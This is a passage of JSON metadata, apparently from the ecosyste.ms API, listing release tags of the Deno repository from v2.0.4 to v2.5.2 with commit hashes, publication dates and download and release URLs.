tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2